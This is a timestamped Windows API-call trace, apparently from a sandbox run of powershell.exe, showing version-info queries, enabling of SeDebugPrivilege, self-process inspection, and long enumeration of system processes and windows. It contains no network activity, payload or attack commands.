	[0940.611] lstrcpyW (in: lpString1=0x38b990, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0940.611] CoTaskMemFree (pv=0x38b990) 
	[0940.611] VerQueryValueW (in: pBlock=0x2be72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1adb28, puLen=0x1adb20 | out: lplpBuffer=0x1adb28*=0x0, puLen=0x1adb20) returned 0
	[0940.611] VerQueryValueW (in: pBlock=0x2be72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1adb28, puLen=0x1adb20 | out: lplpBuffer=0x1adb28*=0x0, puLen=0x1adb20) returned 0
	[0940.611] VerQueryValueW (in: pBlock=0x2be72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1adb28, puLen=0x1adb20 | out: lplpBuffer=0x1adb28*=0x0, puLen=0x1adb20) returned 0
	[0940.611] VerQueryValueW (in: pBlock=0x2be72f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1adaf8, puLen=0x1adaf0 | out: lplpBuffer=0x1adaf8*=0x2be738c, puLen=0x1adaf0) returned 1
	[0940.612] CoTaskMemAlloc (cb=0x204) returned 0x3c4110
	[0940.612] VerLanguageNameW (in: wLang=0x0, szLang=0x3c4110, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0940.614] CoTaskMemFree (pv=0x3c4110) 
	[0940.614] VerQueryValueW (in: pBlock=0x2be72f0, lpSubBlock="\\", lplpBuffer=0x1adb48, puLen=0x1adb40 | out: lplpBuffer=0x1adb48*=0x2be7318, puLen=0x1adb40) returned 1
	[0940.619] GetCurrentProcessId () returned 0x14e8
	[0940.715] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1aca70 | out: lpLuid=0x1aca70*(LowPart=0x14, HighPart=0)) returned 1
	[0940.718] GetCurrentProcess () returned 0xffffffffffffffff
	[0940.719] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1aca90 | out: TokenHandle=0x1aca90*=0x2d0) returned 1
	[0940.720] AdjustTokenPrivileges (in: TokenHandle=0x2d0, DisableAllPrivileges=0, NewState=0x2beab68*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0940.721] CloseHandle (hObject=0x2d0) returned 1
	[0940.725] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x14e8) returned 0x2d0
	[0940.735] EnumProcessModules (in: hProcess=0x2d0, lphModule=0x2beabd0, cb=0x200, lpcbNeeded=0x1adaa8 | out: lphModule=0x2beabd0, lpcbNeeded=0x1adaa8) returned 1
	[0940.737] GetModuleInformation (in: hProcess=0x2d0, hModule=0x13f370000, lpmodinfo=0x2beae40, cb=0x18 | out: lpmodinfo=0x2beae40*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0940.738] CoTaskMemAlloc (cb=0x804) returned 0x41d3a0
	[0940.738] GetModuleBaseNameW (in: hProcess=0x2d0, hModule=0x13f370000, lpBaseName=0x41d3a0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0940.738] CoTaskMemFree (pv=0x41d3a0) 
	[0940.739] CoTaskMemAlloc (cb=0x804) returned 0x41d3a0
	[0940.739] GetModuleFileNameExW (in: hProcess=0x2d0, hModule=0x13f370000, lpFilename=0x41d3a0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0940.739] CoTaskMemFree (pv=0x41d3a0) 
	[0940.740] CloseHandle (hObject=0x2d0) returned 1
	[0940.748] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x14e8) returned 0x2d0
	[0940.749] GetExitCodeProcess (in: hProcess=0x2d0, lpExitCode=0x1adbd8 | out: lpExitCode=0x1adbd8*=0x103) returned 1
	[0940.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12beb088, Length=0x20000, ResultLength=0x1adba0 | out: SystemInformation=0x12beb088, ResultLength=0x1adba0*=0x4a0a0) returned 0xc0000004
	[0940.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c0b0b8, Length=0x4c8a0, ResultLength=0x1adba0 | out: SystemInformation=0x12c0b0b8, ResultLength=0x1adba0*=0x4a0a0) returned 0x0
	[0941.137] EnumWindows (lpEnumFunc=0x2b666ac, lParam=0x0) returned 1
	[0941.139] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x4d0
	[0941.139] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x558
	[0941.139] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x4d0
	[0941.139] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x4d0
	[0941.139] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x4d0
	[0941.139] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x538
	[0941.140] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x4d0
	[0941.140] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x778
	[0941.140] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x778
	[0941.140] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x4d0
	[0941.140] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x4d0
	[0941.140] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x4d0
	[0941.140] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x4d0
	[0941.140] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x4d0
	[0941.140] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x4d0
	[0941.140] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x4d0
	[0941.140] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x4d0
	[0941.141] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x460
	[0941.141] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x4d0
	[0941.141] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x4d0
	[0941.141] GetWindowThreadProcessId (in: hWnd=0x10bd6, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x2440
	[0941.141] GetWindowThreadProcessId (in: hWnd=0x10bb6, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x24d8
	[0941.141] GetWindowThreadProcessId (in: hWnd=0x10ba8, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1aa4
	[0941.141] GetWindowThreadProcessId (in: hWnd=0x10b74, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1ff0
	[0941.141] GetWindowThreadProcessId (in: hWnd=0x10b66, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1a84
	[0941.141] GetWindowThreadProcessId (in: hWnd=0x10b62, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1fb0
	[0941.141] GetWindowThreadProcessId (in: hWnd=0x10b5e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1e10
	[0941.142] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x23a8
	[0941.142] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1f24
	[0941.142] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x21ec
	[0941.142] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x2320
	[0941.142] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1fd4
	[0941.142] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1880
	[0941.142] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1b18
	[0941.142] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1d6c
	[0941.142] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x233c
	[0941.142] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x2368
	[0941.142] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x2124
	[0941.143] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x22f0
	[0941.143] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x22ac
	[0941.143] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1cdc
	[0941.143] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x10f0
	[0941.143] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1f18
	[0941.143] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x20a8
	[0941.143] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x2004
	[0941.143] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1f88
	[0941.143] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1f84
	[0941.143] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x2050
	[0941.143] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1e04
	[0941.144] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1ecc
	[0941.144] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1e64
	[0941.144] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1b58
	[0941.144] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1e94
	[0941.144] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1e28
	[0941.144] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1df8
	[0941.144] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1da8
	[0941.144] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1c70
	[0941.144] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x163c
	[0941.144] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1a10
	[0941.144] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x186c
	[0941.145] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1d74
	[0941.145] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x4c8
	[0941.145] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1960
	[0941.145] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1ce4
	[0941.145] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1b24
	[0941.145] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x14e0
	[0941.145] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x17f0
	[0941.145] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x854
	[0941.145] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1268
	[0941.145] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1624
	[0941.145] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1b9c
	[0941.146] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x16f4
	[0941.146] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x145c
	[0941.146] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x17d0
	[0941.146] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1d28
	[0941.146] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xcb8
	[0941.146] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1190
	[0941.146] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x3a8
	[0941.146] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1bd0
	[0941.146] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1bfc
	[0941.146] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1a78
	[0941.146] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1b90
	[0941.147] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1b04
	[0941.147] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1b34
	[0941.147] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1b64
	[0941.147] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1bb0
	[0941.147] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1acc
	[0941.147] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1a2c
	[0941.147] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x19a8
	[0941.147] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1944
	[0941.147] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x18c8
	[0941.147] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x18ac
	[0941.148] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x18ec
	[0941.148] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1898
	[0941.148] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xc98
	[0941.148] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x153c
	[0941.148] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1808
	[0941.148] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x12a4
	[0941.148] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1740
	[0941.148] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x16c4
	[0941.148] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1820
	[0941.148] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x16ac
	[0941.148] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1858
	[0941.149] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1664
	[0941.149] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x10b4
	[0941.149] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x10ac
	[0941.149] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x10ec
	[0941.149] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1068
	[0941.149] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x17e0
	[0941.149] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x102c
	[0941.149] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x17a4
	[0941.149] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1050
	[0941.149] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1694
	[0941.149] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1770
	[0941.150] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1720
	[0941.150] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x165c
	[0941.150] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1578
	[0941.150] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x16c0
	[0941.150] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x161c
	[0941.150] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1638
	[0941.150] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x15c8
	[0941.150] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1554
	[0941.150] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1674
	[0941.150] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1520
	[0941.150] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x14bc
	[0941.151] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xf8c
	[0941.151] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xe9c
	[0941.151] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1434
	[0941.151] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x14ec
	[0941.152] GetWindow (hWnd=0x1064e, uCmd=0x4) returned 0x0
	[0941.152] IsWindowVisible (hWnd=0x1064e) returned 0
	[0941.153] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xfcc
	[0941.153] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x12ac
	[0941.153] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1484
	[0941.153] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x934
	[0941.153] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xc0c
	[0941.153] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xb08
	[0941.153] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x948
	[0941.153] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1178
	[0941.153] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x13e0
	[0941.153] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xcd0
	[0941.153] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x13fc
	[0941.154] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xdc8
	[0941.154] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xc18
	[0941.154] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xc2c
	[0941.154] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xa1c
	[0941.154] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1244
	[0941.154] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xdb0
	[0941.154] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1398
	[0941.154] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1358
	[0941.154] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1370
	[0941.154] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1340
	[0941.154] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x130c
	[0941.155] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x12c0
	[0941.155] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x12e4
	[0941.155] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1270
	[0941.155] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1298
	[0941.155] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x120c
	[0941.155] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x122c
	[0941.155] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x11c4
	[0941.155] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x11b0
	[0941.155] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1188
	[0941.155] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1148
	[0941.155] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1160
